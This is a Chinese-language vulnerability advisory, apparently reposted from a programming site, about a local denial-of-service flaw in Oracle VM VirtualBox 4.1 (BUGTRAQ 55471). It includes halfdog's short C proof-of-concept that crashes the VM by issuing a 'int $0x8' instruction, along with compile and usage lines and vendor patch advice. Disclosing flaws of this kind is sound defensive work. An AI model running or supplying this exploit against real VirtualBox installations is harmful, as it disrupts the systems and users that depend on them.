发布日期:2012-09-08 更新日期:2012-09-12受影响系统: Oracle VM VirtualBox 4.1 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 55471VirtualBox是一种x86的虚拟化产品。Oracle VM VirtualBox存在本地拒绝服务漏洞,攻击者可利用此漏洞造成拒绝服务。<*来源:halfdog *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!/** This software is provided by the copyright owner "as is" and any * expressed or implied warranties, including, but not limited to, * the implied warranties of merchantability and fitness for a particular * purpose are disclaimed. In no event shall the copyright owner be * liable for any direct, indirect, incidential, special, exemplary or * consequential damages, including, but not limited to, procurement * of substitute goods or services, loss of use, data or profits or * business interruption, however caused and on any theory of liability, * whether in contract, strict liability, or tort, including negligence * or otherwise, arising in any way out of the use of this software, * even if advised of the possibility of such damage. * * Copyright (c) 2012 halfdog <me (%) halfdog.net> * * Compile: gcc -o RtcInt RtcInt.c * Usage: ./RtcInt */ int main(int argc, char **argv) { asm ( "int $0x8;" : // output: none : // input: none :"%eax", "%ebx", "%ecx", "%edx" // clobbered register ); return(0); }建议: -------------------------------------------------------------------------------- 厂商补丁:Oracle ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.oracle.com/technetwork/topics/security/FreeRADIUS多个栈缓冲区溢出漏洞XnView TIFF图形处理多个远程堆缓冲区溢出漏洞相关资讯 拒绝服务漏洞
易网时代-编程资源站